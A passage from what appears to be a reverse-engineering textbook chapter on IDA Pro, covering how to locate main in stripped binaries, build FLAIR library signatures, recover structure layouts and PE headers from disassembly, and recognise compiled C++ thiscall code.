remains present in the final executable file where it can be examined by tools such as
IDA Pro to learn what all of the functions within a program were originally named. If we
assume, which can be dangerous, that programmers tend to name functions and variables
according to their purpose, then we can learn a tremendous amount of information
simply by having these symbol names available to us. The process of “stripping” a
binary involves removing all symbol information that is no longer required once the
binary has been built. Stripping is generally performed by using the command-line strip
utility and, as a result of removing extraneous information, has the side effect of yielding
a smaller binary. From a reverse-engineering perspective, however, stripping makes a
binary slightly more difficult to analyze as a result of the loss of all of the symbols. In
this regard, stripping a binary can be seen as a primitive form of obfuscation. The most
immediate impact of dealing with a stripped binary in IDA is that IDA will be unable to
locate the main function and will instead initially position the disassembly view at the
program’s true entry point, generally named _start.
NOTE Contrary to popular belief, main is not the first thing executed in a
compiled C or C++ program. A significant amount of initialization must take
place before control can be transferred to main. Some of the startup tasks
include initialization of the C libraries, initialization of global objects, and
creation of the argv and envp arguments expected by main.
You will seldom desire to reverse-engineer all of the startup code added by the compiler,
so locating main is a handy thing to be able to do. Fortunately, each compiler
tends to have its own style of initialization code, so with practice you will be able to recognize
the compiler that was used based simply on the startup sequence. Since the last
thing that the startup sequence does is transfer control to main, you should be able to
locate main easily regardless of whether a binary has been stripped. Listing 13-1 shows
the _start function for a gcc compiled binary that has not been stripped.
Listing 13-1
_start proc near
xor ebp, ebp
pop esi
mov ecx, esp
and esp, 0FFFFFFF0h
push eax
push esp
push edx
push offset __libc_csu_fini
push offset __libc_csu_init
push ecx
push esi
push offset main
call ___libc_start_main
hlt
_start endp
Notice that main is not called directly; rather it is passed as a parameter to the library
function __libc_start_main. The __libc_start_main function takes care of libc initialization,
pushing the proper arguments to main, and finally transferring control to main.
Note that main is the last parameter pushed before the call to __libc_start_main. Listing
13-2 shows the _start function from the same binary after it has been stripped.
Listing 13-2
start proc near
xor ebp, ebp
pop esi
mov ecx, esp
and esp, 0FFFFFFF0h
push eax
push esp
push edx
push offset sub_804888C
push offset sub_8048894
push ecx
push esi
push offset loc_8048654
call ___libc_start_main
hlt
start endp
In this second case, we can see that IDA no longer understands the name main. We also
notice that two other function names have been lost as a result of the stripping operation,
while one function has managed to retain its name. It is important to note that the
behavior of _start has not been changed in any way by the strip operation. As a result, we
can apply what we learned from Listing 13-1, that main is the last argument pushed to
__libc_start_main, and deduce that loc_8048654 must be the start address of main; we
are free to rename loc_8048654 to main as an early step in our reversing process.
One question we need to understand the answer to is why __libc_start_main has
managed to retain its name while all of the other functions we saw in Listing 13-1 lost
theirs. The answer lies in the fact that the binary we are looking at was dynamically
linked (the file command would tell us so) and __libc_start_main is being imported
from libc.so, the shared C library. The stripping process has no effect on imported or
exported function and symbol names. This is because the runtime dynamic linker must
be able to resolve these names across the various shared components required by the
program. We will see in the next section that we are not always so lucky when we
encounter statically linked binaries.
Statically Linked Programs and FLAIR
When compiling programs that make use of library functions, the linker must be told
whether to use shared libraries such as .dll or .so files, or static libraries such as .a files.
Programs that use shared libraries are said to be dynamically linked, while programs that
use static libraries are said to be statically linked. Each form of linking has its own advantages
and disadvantages. Dynamic linking results in smaller executables and easier
upgrading of library components at the expense of some extra overhead when launching
the binary, and the chance that the binary will not run if any required libraries are
missing. To learn what dynamic libraries an executable depends on, you can use the
dumpbin utility on Windows, ldd on Linux, and otool on Mac OS X. Each will list the
names of the shared libraries that the loader must find in order to execute a given
dynamically linked program. Static linking results in much larger binaries because
library code is merged with program code to create a single executable file that has no
external dependencies, making the binary easier to distribute. As an example, consider a
program that makes use of the openssl cryptographic libraries. If this program is built to
use shared libraries, then each computer on which the program is installed must contain
a copy of the openssl libraries. The program would fail to execute on any computer that
does not have openssl installed. Statically linking that same program eliminates the
requirement to have openssl present on computers that will be used to run the program,
making distribution of the program somewhat easier.
From a reverse-engineering point of view, dynamically linked binaries are somewhat
easier to analyze for several reasons. First, dynamically linked binaries contain little to
no library code, which means that the code that you get to see in IDA is just the code that
is specific to the application, making it both smaller and easier to focus on application-specific
code rather than library code. The last thing you want to do is spend your time
reversing library code that is generally accepted to be fairly secure. Second, when a
dynamically linked binary is stripped, it is not possible to strip the names of library
functions called by the binary, which means the disassembly will continue to contain
useful function names in many cases. Statically linked binaries present more of a challenge
because they contain far more code to disassemble, most of which belongs to
libraries. However, as long as the statically linked program has not been stripped, you
will continue to see all of the same names that you would see in a dynamically linked
version of the same program. A stripped, statically linked binary presents the largest
challenge for reverse engineering. When the strip utility removes symbol information
from a statically linked program, it removes not only the function and global variable
names associated with the program, but it also removes the function and global variable
names associated with any libraries that were linked in as well. As a result it is extremely
difficult to distinguish program code from library code in such a binary. Further it is difficult
to determine exactly how many libraries may have been linked into the program.
IDA has facilities (not well documented) for dealing with exactly this situation.
Listing 13-3 shows what our _start function ends up looking like in a statically
linked, stripped binary.
Listing 13-3
start proc near
xor ebp, ebp
pop esi
mov ecx, esp
and esp, 0FFFFFFF0h
push eax
push esp
push edx
push offset sub_8048AD4
push offset sub_8048B10
push ecx
push esi
push offset sub_8048208
call sub_8048440
start endp
At this point we have lost the names of every function in the binary and we need some
method for locating the main function so that we can begin analyzing the program in
earnest. Based on what we saw in Listings 13-1 and 13-2, we can proceed as follows:
• Find the last function called from _start; this should be __libc_start_main.
• Locate the first argument to __libc_start_main; this will be the topmost item
on the stack, usually the last item pushed prior to the function call. In this case,
we deduce that main must be sub_8048208. We are now prepared to start
analyzing the program beginning with main.
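The two steps above are mechanical enough to sketch in code. The following is only an illustration that operates on disassembly text such as Listing 13-3, under the assumption that the startup code follows the gcc pattern shown in this chapter; find_main is a hypothetical helper, not an IDA function.

```python
def find_main(start_listing):
    """Return the operand of the last push before the final call in _start."""
    last_push = None
    main_candidate = None
    for line in start_listing.splitlines():
        parts = line.split()
        if not parts:
            continue
        if parts[0] == "push":
            last_push = parts[-1]        # e.g. "sub_8048208"
        elif parts[0] == "call":
            main_candidate = last_push   # the last call seen wins
    return main_candidate

# The push/call sequence from Listing 13-3
LISTING_13_3 = """\
push eax
push esp
push edx
push offset sub_8048AD4
push offset sub_8048B10
push ecx
push esi
push offset sub_8048208
call sub_8048440
"""
```

Calling find_main(LISTING_13_3) returns 'sub_8048208', the same conclusion we reached by hand.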
Locating main is only a small victory, however. By comparing Listing 13-4 from the
unstripped version of the binary with Listing 13-5 from the stripped version, we can see
that we have completely lost the ability to distinguish the boundaries between user code
and library code.
Listing 13-4
mov eax, stderr
mov [esp+250h+var_244], eax
mov [esp+250h+var_248], 14h
mov [esp+250h+var_24C], 1
mov [esp+250h+var_250], offset aUsageFetchHost ; "usage: fetch
call fwrite
mov [esp+250h+var_250], 1
call exit
; ------------------------------------------------------------
loc_804825F: ; CODE XREF: main+24^j
mov edx, [ebp-22Ch]
mov eax, [edx+4]
add eax, 4
mov eax, [eax]
mov [esp+250h+var_250], eax
call gethostbyname
mov [ebp-10h], eax
Listing 13-5
mov eax, off_80BEBE4
mov [esp+250h+var_244], eax
mov [esp+250h+var_248], 14h
mov [esp+250h+var_24C], 1
mov [esp+250h+var_250], offset aUsageFetchHost ; "usage: fetch
call loc_8048F7C
mov [esp+250h+var_250], 1
call sub_8048BB0
; ------------------------------------------------------------
loc_804825F: ; CODE XREF: sub_8048208+24^j
mov edx, [ebp-22Ch]
mov eax, [edx+4]
add eax, 4
mov eax, [eax]
mov [esp+250h+var_250], eax
call loc_8052820
mov [ebp-10h], eax
In Listing 13-5, we have lost the names of stderr, fwrite, exit, and gethostbyname, and
each is indistinguishable from any other user space function or global variable. The danger
we face is that being presented with the binary from Listing 13-5, we might attempt
to reverse-engineer the function at loc_8048F7C. Having done so, we would be disappointed
to learn that we have done nothing more than reverse a piece of the C standard
library. Clearly, this is not a desirable situation for us. Fortunately, IDA possesses the
ability to help out in these circumstances.
Fast Library Identification and Recognition Technology (FLIRT) is the name that IDA gives
to its ability to automatically recognize functions based on pattern/signature matching.
IDA uses FLIRT to match code sequences against many signatures for widely used libraries.
IDA’s initial use of FLIRT against any binary is to attempt to determine the compiler
that was used to generate the binary. This is accomplished by matching entry point
sequences (such as those we saw in Listings 13-1 through 13-3) against stored signatures
for various compilers. Once the compiler has been identified, IDA attempts to match
against additional signatures more relevant to the identified compiler. In cases where
IDA does not pick up on the exact compiler that was used to create the binary, you can
force IDA to apply any additional signatures from IDA’s list of available signature files.
Signature application takes place via the File | Load File | FLIRT Signature File menu
option, which brings up the dialog box shown in Figure 13-1.
The dialog box is populated based on the contents of IDA’s sig subdirectory. Selecting
one of the available signature sets causes IDA to scan the current binary for possible
matches. For each match that is found, IDA renames the matching code in accordance
with the signature. When the signature files are correct for the current binary, this operation
has the effect of unstripping the binary. It is important to understand that IDA does
not come complete with signatures for every static library in existence. Consider the
number of different libraries shipped with any Linux distribution and you can appreciate
the magnitude of this problem. To address this limitation, DataRescue ships a tool
set called Fast Library Acquisition for Identification and Recognition (FLAIR). FLAIR consists
of several command-line utilities used to parse static libraries and generate IDA-compatible
signature files.
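Conceptually, signature matching compares the leading bytes of a function against stored byte patterns in which bytes that vary from one link to the next (relocated addresses, for example) are treated as wildcards. The sketch below illustrates only that idea; it is not IDA's signature file format or matching algorithm, and the signature name and bytes are hypothetical.

```python
def matches(pattern, code):
    """pattern: hex string in which '..' is a wildcard byte; code: bytes."""
    pairs = [pattern[i:i + 2] for i in range(0, len(pattern), 2)]
    if len(code) < len(pairs):
        return False
    return all(p == ".." or int(p, 16) == b for p, b in zip(pairs, code))

def identify(code, signatures):
    """Return the first signature name whose pattern matches, else None."""
    for name, pattern in signatures.items():
        if matches(pattern, code):
            return name
    return None

# Hypothetical signature: push ebp; mov ebp, esp; call <any>; leave; ret
SIGNATURES = {"hypothetical_lib_func": "5589E5E8........C9C3"}
```

With these definitions, identify(bytes.fromhex("5589E5E811223344C9C3"), SIGNATURES) returns 'hypothetical_lib_func' regardless of the four call-displacement bytes, while a function ending in a different opcode is not matched.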
Generating IDA Sig Files
Installation of the FLAIR tools is as simple as unzipping the FLAIR distribution (currently
flair51.zip) into a working directory. Beware that FLAIR distributions are generally
not backward compatible with older versions of IDA, so be sure to obtain the appropriate
version of FLAIR for your version of IDA. After you have extracted the tools, you will
find the entire body of existing FLAIR documentation in the three files named pat.txt,
readme.txt, and sigmake.txt. You are encouraged to read through these files for more
detailed information on creating your own signature files.
Figure 13-1 IDA library signature selection dialog
The first step in creating signatures for a new library involves the extraction of patterns
for each function in the library. FLAIR comes with pattern-generating parsers for
several common static library file formats. All FLAIR tools are located in FLAIR’s bin subdirectory.
The pattern generators are named pXXX, where XXX represents various library
file formats. In the following example we will generate a sig file for the statically linked
version of the standard C library (libc.a) that ships with FreeBSD 6.2. After moving
libc.a onto our development system, the following command is used to generate a pattern
file:
# ./pelf libc.a libc_FreeBSD62.pat
libc_FreeBSD62.a: skipped 0, total 988
We choose the pelf tool because FreeBSD uses ELF format binaries. In this case, we are
working in FLAIR’s bin directory. If you wish to work in another directory, the usual
PATH issues apply for locating the pelf program. FLAIR pattern files are ASCII text files
containing patterns for each exported function within the library being parsed. Patterns
are generated from the first 32 bytes of a function, from some intermediate bytes of the
function for which a CRC16 value is computed, and from the 32 bytes following the
bytes used to compute the cyclic redundancy check (CRC). Pattern formats are described
in more detail in the pat.txt file included with FLAIR. The second step in creating a sig
file is to use the sigmake tool to create a binary signature file from a generated pattern
file. The following command attempts to generate a sig file from the previously generated
pattern file:
# ../sigmake.exe -n"FreeBSD 6.2 standard C library" \
> libc_FreeBSD62.pat libc_FreeBSD62.sig
See the documentation to learn how to resolve collisitions.
: modules/leaves: 13443664/988, COLLISIONS: 924
The -n option can be used to specify the “Library name” of the sig file as displayed in
the sig file selection dialog box (see Figure 13-1). The default name assigned by sigmake
is “Unnamed Sample Library.” The last two arguments for sigmake represent the input
pattern file and the output sig file respectively. In this example we seem to have a problem;
sigmake is reporting some collisions. In a nutshell, collisions occur when two functions
reduce to the same signature. If any collisions are found, sigmake will refuse to
generate a sig file and instead generates an exclusions (.exc) file. The first few lines of this
particular exclusions file are shown here:
;--------- (delete these lines to allow sigmake to read this file)
; add '+' at the start of a line to select a module
; add '-' if you are not sure about the selection
; do nothing if you want to exclude all modules
___ntohs 00 0000 FB744240486C4C3................................................
___htons 00 0000 FB744240486C4C3................................................
In this example, we see that the functions ntohs and htons have the same signature,
which is not surprising considering that they do the same thing on an x86 architecture,
namely swap the bytes in a two-byte short value. The exclusions file must be edited to
instruct sigmake how to resolve each collision. As shown earlier, basic instructions for
this can be found in the generated .exc file. At a minimum, the comment lines (those
beginning with a semicolon) must be removed. You must then choose which, if any, of
the colliding functions you wish to keep. In this example, if we choose to keep htons, we
must prefix the htons line with a “+” character telling sigmake to treat any function with
the same signature as if it were htons rather than ntohs. More detailed instructions on
how to resolve collisions can be found in FLAIR’s sigmake.txt file. Once you have edited
the exclusions file, simply rerun sigmake with the same options. A successful run will
result in no error or warning messages and the creation of the requested sig file.
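The notion of a collision, and of resolving one by marking a preferred name, can be sketched as follows. This is not how sigmake is implemented and it does not parse real .pat or .exc files; the pattern strings are placeholders and the function names are hypothetical.

```python
from collections import defaultdict

def find_collisions(patterns):
    """Group function names by pattern; keep only groups with 2+ names."""
    groups = defaultdict(list)
    for name, pattern in patterns:
        groups[pattern].append(name)
    return {p: names for p, names in groups.items() if len(names) > 1}

def resolve(collisions, keep):
    """Mimic prefixing one line per group with '+': pattern -> kept name.

    Groups with no chosen name are left out, as if every module in the
    group had been excluded.
    """
    resolved = {}
    for pattern, names in collisions.items():
        chosen = [n for n in names if n in keep]
        if len(chosen) == 1:
            resolved[pattern] = chosen[0]
    return resolved

# Placeholder patterns; ntohs and htons reduce to the same one.
PATTERNS = [("___ntohs", "PATTERN_A"), ("___htons", "PATTERN_A"),
            ("_exit", "PATTERN_B")]
```

Here find_collisions(PATTERNS) returns {'PATTERN_A': ['___ntohs', '___htons']}, and resolve(..., keep={'___htons'}) maps that pattern to ___htons, which corresponds to placing a "+" in front of the htons line of the exclusions file.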
Installing the newly created signature file is simply a matter of copying it to the sig subdirectory
under your main IDA program directory. The installed signatures will now be
available for use as shown in Figure 13-2.
Figure 13-2 Selecting appropriate signatures
Applying the new signatures to the following code:
.text:0804872C push ebp
.text:0804872D mov ebp, esp
.text:0804872F sub esp, 18h
.text:08048732 call sub_80593B0
.text:08048737 mov [ebp+var_4], eax
.text:0804873A call sub_805939C
.text:0804873F mov [ebp+var_8], eax
.text:08048742 sub esp, 8
.text:08048745 mov eax, [ebp+arg_0]
.text:08048748 push dword ptr [eax+0Ch]
.text:0804874B mov eax, [ebp+arg_0]
.text:0804874E push dword ptr [eax]
.text:08048750 call sub_8057850
.text:08048755 add esp, 10h
yields the following improved disassembly in which we are far less likely to waste time
analyzing any of the three functions that are called.
.text:0804872C push ebp
.text:0804872D mov ebp, esp
.text:0804872F sub esp, 18h
.text:08048732 call ___sys_getuid
.text:08048737 mov [ebp+var_4], eax
.text:0804873A call ___sys_getgid
.text:0804873F mov [ebp+var_8], eax
.text:08048742 sub esp, 8
.text:08048745 mov eax, [ebp+arg_0]
.text:08048748 push dword ptr [eax+0Ch]
.text:0804874B mov eax, [ebp+arg_0]
.text:0804874E push dword ptr [eax]
.text:08048750 call _initgroups
.text:08048755 add esp, 10h
We have not covered how to identify exactly which static library files to use when generating
your IDA sig files. It is safe to assume that statically linked C programs are linked
against the static C library. To generate accurate signatures, it is important to track down
a version of the library that closely matches the one with which the binary was linked.
Here, some file and strings analysis can assist in narrowing the field of operating systems
that the binary may have been compiled on. The file utility can distinguish among various
platforms such as Linux, FreeBSD, or OS X, and the strings utility can be used to
search for version strings that may point to the compiler or libc version that was used.
Armed with that information, you can attempt to locate the appropriate libraries from a
matching system. If the binary was linked with more than one static library, additional
strings analysis may be required to identify each additional library. Useful things to
look for in strings output include copyright notices, version strings, usage instructions,
or other unique messages that could be thrown into a search engine in an attempt to
identify each additional library. By identifying as many libraries as possible and applying
their signatures, you greatly reduce the amount of code that you need to spend time
analyzing and get to focus more attention on application-specific code.
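The kind of strings analysis described here is easy to automate. The following sketch mimics the basic behavior of the strings utility and filters the results for likely version or copyright notices; the keyword list and the sample data are assumptions chosen for illustration, not output from a real binary.

```python
import re

def printable_strings(data, min_len=4):
    """Yield runs of at least min_len printable ASCII bytes."""
    for match in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data):
        yield match.group().decode("ascii")

def version_hints(data, keywords=("GCC", "version", "Copyright")):
    """Return the strings that mention any of the given keywords."""
    return [s for s in printable_strings(data)
            if any(k.lower() in s.lower() for k in keywords)]

# Hypothetical fragment of a binary's contents
SAMPLE = b"\x00\x01GCC: (GNU) 3.4.6 [FreeBSD] 20060305\x00ab\x00usage: fetch\x00"
```

For this sample, version_hints(SAMPLE) returns ['GCC: (GNU) 3.4.6 [FreeBSD] 20060305'], a string that would suggest both the compiler and the platform on which to look for a matching libc.a.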
Data Structure Analysis
One consequence of compilation being a lossy operation is that we lose access to data
declarations and structure definitions, which makes it far more difficult to understand
the memory layout in disassembled code. As mentioned in Chapter 12, IDA provides
the capability to define the layout of data structures and then to apply those structure
definitions to regions of memory. Once a structure template has been applied to a
region of memory, IDA can utilize structure field names in place of integer offsets within
the disassembly, making the disassembly far more readable. There are two important
steps in determining the layout of data structures in compiled code. The first step is to
determine the size of the data structure. The second step is to determine how the structure
is subdivided into fields and what type is associated with each field. The program in
Listing 13-6 and its corresponding compiled version in Listing 13-7 will be used to illustrate
several points about disassembling structures.
Listing 13-6
1: #include <stdlib.h>
2: #include <math.h>
3: #include <string.h>
4: typedef struct GrayHat_t {
5:     char buf[80];
6:     int val;
7:     double squareRoot;
8: } GrayHat;
9: int main(int argc, char **argv) {
10:     GrayHat gh;
11:     if (argc == 4) {
12:         GrayHat *g = (GrayHat*)malloc(sizeof(GrayHat));
13:         strncpy(g->buf, argv[1], 80);
14:         g->val = atoi(argv[2]);
15:         g->squareRoot = sqrt(atof(argv[3]));
16:         strncpy(gh.buf, argv[0], 80);
17:         gh.val = 0xdeadbeef;
18:     }
19:     return 0;
20: }
Listing 13-7
1: ; int __cdecl main(int argc,const char **argv,const char *envp)
2: _main proc near
3: var_70 = qword ptr -112
4: dest = byte ptr -96
5: var_10 = dword ptr -16
6: argc = dword ptr 8
7: argv = dword ptr 12
8: envp = dword ptr 16
9: push ebp
10: mov ebp, esp
11: add esp, 0FFFFFFA0h
12: push ebx
13: push esi
14: mov ebx, [ebp+argv]
15: cmp [ebp+argc], 4 ; argc != 4
16: jnz short loc_4011B6
17: push 96 ; struct size
18: call _malloc
19: pop ecx
20: mov esi, eax ; esi points to struct
21: push 80 ; maxlen
22: push dword ptr [ebx+4] ; argv[1]
23: push esi ; start of struct
24: call _strncpy
25: add esp, 0Ch
26: push dword ptr [ebx+8] ; argv[2]
27: call _atol
28: pop ecx
29: mov [esi+80], eax ; 80 bytes into struct
30: push dword ptr [ebx+12] ; argv[3]
31: call _atof
32: pop ecx
33: add esp, 0FFFFFFF8h
34: fstp [esp+70h+var_70]
35: call _sqrt
36: add esp, 8
37: fstp qword ptr [esi+88] ; 88 bytes into struct
38: push 80 ; maxlen
39: push dword ptr [ebx] ; argv[0]
40: lea eax, [ebp-96]
41: push eax ; dest
42: call _strncpy
43: add esp, 0Ch
44: mov [ebp-16], 0DEADBEEFh
45: loc_4011B6:
46: xor eax, eax
47: pop esi
48: pop ebx
49: mov esp, ebp
50: pop ebp
51: retn
52: _main endp
There are two methods for determining the size of a structure. The first and easiest method
is to find locations at which a structure is dynamically allocated using malloc or new.
Lines 17 and 18 in Listing 13-7 show a call to malloc requesting 96 bytes of memory. Malloced
blocks of memory generally represent either structures or arrays. In this case, we learn that
this program manipulates a structure whose size is 96 bytes. The resulting pointer is transferred
into the esi register and used to access the fields in the structure for the remainder of
the function. References to this structure take place at lines 23, 29, and 37.
The second method of determining the size of a structure is to observe the offsets
used in every reference to the structure and to compute the maximum size required to
house the data that is referenced. In this case, line 23 references the 80 bytes at the beginning
of the structure (based on the maxlen argument pushed at line 21), line 29 references
4 bytes (the size of eax) starting at offset 80 into the structure ([esi + 80]), and line
37 references 8 bytes (a quad word/qword) starting at offset 88 ([esi + 88]) into the
structure. Based on these references, we can deduce that the structure is 88 (the maximum
offset we observe) plus 8 (the size of data accessed at that offset), or 96 bytes long.
Thus we have derived the size of the structure by two different methods. The second
method is useful in cases where we can’t directly observe the allocation of the structure,
perhaps because it takes place within library code.
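The second method amounts to a one-line computation over the observed references. In the sketch below, each reference is recorded as an (offset, width) pair; the helper name struct_size is ours.

```python
def struct_size(accesses):
    """accesses: iterable of (offset, width) pairs; returns the minimum size."""
    return max(offset + width for offset, width in accesses)

# (offset, width) pairs observed at lines 23, 29, and 37 of Listing 13-7
OBSERVED = [(0, 80), (80, 4), (88, 8)]
```

struct_size(OBSERVED) evaluates to 96, matching the value pushed as the argument to malloc. Keep in mind that this is only a lower bound: a structure may have trailing fields that the function under analysis never touches.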
To understand the layout of the bytes within a structure, we must determine the types
of data that are used at each observable offset within the structure. In our example, the
access at line 23 uses the beginning of the structure as the destination of a string copy
operation, limited in size to 80 bytes. We can conclude therefore that the first 80 bytes of
the structure are an array of characters. At line 29, the 4 bytes at offset 80 in the structure
are assigned the result of the function atol, which converts an ASCII string to a long value.
Here we can conclude that the second field in the structure is a 4-byte long. Finally, at
line 37, the 8 bytes at offset 88 into the structure are assigned the double returned by
sqrt, whose argument is the result of atof, which converts an ASCII string to a
floating-point double value. You may have
noticed that the bytes at offsets 84–87 of the structure appear to be unused. There are
two possible explanations for this. The first is that there is a structure field between the
long and the double that is simply not referenced by the function. The second possibility
is that the compiler has inserted some padding bytes to achieve some desired field
alignment. Based on the actual definition of the structure in Listing 13-6, we conclude
that padding is the culprit in this particular case. If we wanted to see meaningful field
names associated with each structure access, we could define a structure in the IDA structure
window as described in Chapter 12. IDA offers an alternative method for defining
structures that you may find far easier to use than its structure editing facilities. IDA can
parse C header files via the File | Load File menu option. If you have access to the source
code or prefer to create a C-style struct definition using a text editor, IDA will parse the
header file and automatically create structures for each struct definition that it encounters
in the header file. The only restriction you must be aware of is that IDA only recognizes
standard C data types. For any nonstandard types, uint32_t, for example, the
header file must contain an appropriate typedef, or you must edit the header file to convert
all nonstandard types to standard types.
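The padding explanation for the unused bytes at offsets 84 through 87 can be checked with a small layout calculator. The sketch below assumes natural alignment (each field aligned to its own size, the double to 8 bytes), which is consistent with the offsets observed in the disassembly but is ultimately a compiler setting. The field names name, count, and value are placeholders rather than names taken from the original source.

```python
def layout(fields):
    """Place (name, size, alignment) fields in order, padding as needed.

    Returns the list of (name, offset, size) tuples and the total size.
    """
    offset, placed, max_align = 0, [], 1
    for name, size, align in fields:
        # Round the running offset up to the field's alignment boundary.
        offset = (offset + align - 1) // align * align
        placed.append((name, offset, size))
        offset += size
        max_align = max(max_align, align)
    # The structure itself is padded to a multiple of its strictest alignment.
    total = (offset + max_align - 1) // max_align * max_align
    return placed, total

# Assumed field list: char[80], 4-byte long, 8-byte double.
fields = [("name", 80, 1), ("count", 4, 4), ("value", 8, 8)]
placed, total = layout(fields)
for name, offset, size in placed:
    print(f"{name:6} offset {offset:3} size {size}")
print("total size", total)
```

Under these assumptions the double lands at offset 88 rather than 84, leaving four padding bytes after the long and giving a total size of 96 bytes.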
Access to stack or globally allocated structures looks quite different from access to
dynamically allocated structures. Listing 13-6 shows that main contains a local, stack-allocated
structure declared at line 10. Lines 16 and 17 of main reference fields in this local
structure. These correspond to lines 40 and 44 in the assembly Listing 13-7. While we can
see that line 44 references memory that is 80 bytes ([ebp-96+80] == [ebp-16]) after the
reference at line 40, we don’t get a sense that the two references belong to the same structure.
This is because the compiler can compute the address of each field (as an absolute
address in a global variable, or a relative address within a stack frame) at compile time,
whereas access to fields in dynamically allocated structures must always be computed at
runtime because the base address of the structure is not known at compile time.
Using IDA Structures to View Program Headers
In addition to enabling you to declare your own data structures, IDA contains a large
number of common data structure templates for various build environments, including
standard C library structures and Windows API structures. An interesting example use of
these predefined structures is to use them to examine the program file headers which, by
default, are not loaded into the analysis database. To examine file headers, you must perform
a manual load when initially opening a file for analysis. Manual loads are selected
via a checkbox on the initial load dialog box as shown in Figure 13-3.
Manual loading forces IDA to ask you whether you wish to load each section of the
binary into IDA’s database. One of the sections that IDA will ask about is the header section,
which will allow you to see all the fields of the program headers including structures
such as the MSDOS and NT file headers. Another section that gets loaded only when a
manual load is performed is the resource section that is used on the Windows platform to
store dialog box and menu templates, string tables, icons, and the file properties. You can
view the fields of the MSDOS header by scrolling to the beginning of a manually loaded
Windows PE file and placing the cursor on the first address in the database, which should
contain the ‘M’ value of the MSDOS ‘MZ’ signature. No layout information will be displayed
until you add the IMAGE_DOS_HEADER to your structures window. This is
accomplished by switching to the Structures tab, pressing INSERT, entering IMAGE_DOS_HEADER
as the Structure Name, and clicking OK as shown in Figure 13-4.
This will pull IDA’s definition of the IMAGE_DOS_HEADER from its type library into
your local structures window and make it available to you. Finally, you need to return to the
disassembly window, position the cursor on the first byte of the DOS header, and use the
ALT-Q hotkey sequence to apply the IMAGE_DOS_HEADER template. The structure may
initially appear in its collapsed form, but you can view all of the struct fields by expanding
the struct with the numeric keypad + key. This results in the display shown next:
HEADER:00400000 __ImageBase dw 5A4Dh        ; e_magic
HEADER:00400000             dw 50h          ; e_cblp
HEADER:00400000             dw 2            ; e_cp
HEADER:00400000             dw 0            ; e_crlc
HEADER:00400000             dw 4            ; e_cparhdr
HEADER:00400000             dw 0Fh          ; e_minalloc
HEADER:00400000             dw 0FFFFh       ; e_maxalloc
HEADER:00400000             dw 0            ; e_ss
HEADER:00400000             dw 0B8h         ; e_sp
HEADER:00400000             dw 0            ; e_csum
HEADER:00400000             dw 0            ; e_ip
HEADER:00400000             dw 0            ; e_cs
HEADER:00400000             dw 40h          ; e_lfarlc
HEADER:00400000             dw 1Ah          ; e_ovno
HEADER:00400000             dw 4 dup(0)     ; e_res
HEADER:00400000             dw 0            ; e_oemid
HEADER:00400000             dw 0            ; e_oeminfo
HEADER:00400000             dw 0Ah dup(0)   ; e_res2
HEADER:00400000             dd 200h         ; e_lfanew
Figure 13-3 Forcing a manual load with IDA
A little research on the contents of the DOS header will tell you that the e_lfanew field
holds the offset to the PE header struct. In this case, we can go to address 00400000 +
200h (00400200) and expect to find the PE header. The PE header fields can be viewed
by repeating the process just described and using IMAGE_NT_HEADERS as the structure
you wish to select and apply.
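The same arithmetic can be reproduced outside of IDA. The following Python sketch unpacks the 64-byte DOS header with the standard struct module and follows e_lfanew to the PE signature. The image it parses is synthetic, built in memory from the field values shown in the listing above, and the helper name pe_header_address is our own.

```python
import struct

# IMAGE_DOS_HEADER: thirty 16-bit words followed by the 32-bit e_lfanew,
# which therefore sits at file offset 0x3C.
DOS_HEADER = struct.Struct("<30HI")
IMAGE_BASE = 0x00400000

def pe_header_address(image, image_base=IMAGE_BASE):
    """Return the virtual address of the PE header described by the DOS header."""
    fields = DOS_HEADER.unpack_from(image, 0)
    e_magic, e_lfanew = fields[0], fields[-1]
    if e_magic != 0x5A4D:                          # 'MZ' read as a little-endian word
        raise ValueError("missing MZ signature")
    if bytes(image[e_lfanew:e_lfanew + 4]) != b"PE\0\0":
        raise ValueError("missing PE signature")
    return image_base + e_lfanew

# Build a synthetic image using the values from the listing above.
words = ([0x5A4D, 0x50, 2, 0, 4, 0x0F, 0xFFFF, 0, 0xB8, 0, 0, 0, 0x40, 0x1A]
         + [0] * 4       # e_res
         + [0, 0]        # e_oemid, e_oeminfo
         + [0] * 10)     # e_res2
image = bytearray(0x204)
DOS_HEADER.pack_into(image, 0, *words, 0x200)      # e_lfanew = 200h
image[0x200:0x204] = b"PE\0\0"

print(hex(pe_header_address(image)))               # prints 0x400200
```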
Quirks of Compiled C++ Code
C++ is a somewhat more complex language than C, offering member functions and
polymorphism, among other things. These two features require implementation details
that make compiled C++ code look rather different than compiled C code when they are
used. First, all nonstatic member functions require a this pointer; and second, polymorphism
is implemented through the use of vtables.
NOTE In C++ a this pointer is available in all nonstatic member functions.
This points to the object for which the member function was called and
allows a single function to operate on many different objects merely by
providing different values for this each time the function is called.
Figure 13-4 Importing the IMAGE_DOS_HEADER structure
The means by which this pointers are passed to member functions vary from compiler
to compiler. Microsoft compilers take the address of the calling object and place it in the
ecx register prior to calling a member function. Microsoft refers to this calling convention
as thiscall. Other compilers, such as Borland and g++, push the address of the calling
object as the first (leftmost) parameter to the member function, effectively making
this an implicit first parameter for all nonstatic member functions. C++ programs compiled
with Microsoft compilers are very recognizable as a result of their use of thiscall.
Listing 13-8 shows a simple example.
Listing 13-8
demo proc near
this = dword ptr -4
val = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+this], ecx ; save this into a local variable
mov eax, [ebp+this]
mov ecx, [ebp+val]
mov [eax], ecx
mov edx, [ebp+this]
mov eax, [edx]
mov esp, ebp
pop ebp
retn 4
demo endp
; int __cdecl main(int argc,const char **argv,const char *envp)
_main proc near
x = dword ptr -8
e = byte ptr -4
argc = dword ptr 8
argv = dword ptr 0Ch
envp = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push 3
lea ecx, [ebp+e] ; address of e loaded into ecx
call demo ; demo must be a member function
mov [ebp+x], eax
mov esp, ebp
pop ebp
retn
_main endp
Because Borland and g++ pass this as a regular stack parameter, their code tends to look
more like traditional compiled C code and does not immediately stand out as compiled
C++.
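As a loose analogy only, Python makes the "implicit first parameter" idea explicit: a method call on an object is equivalent to calling the function through the class and passing the object as the leftmost argument. The class and method names below are made up to mirror the demo function in Listing 13-8, which stores its argument into the object and returns it.

```python
class Example:
    def demo(self, val):
        # self plays the role of this: the object the call operates on.
        self.value = val
        return self.value

e = Example()
x = Example.demo(e, 3)   # the object is passed as an ordinary first argument
y = e.demo(3)            # the usual spelling; Python supplies self for us
print(x, y)              # prints 3 3
```

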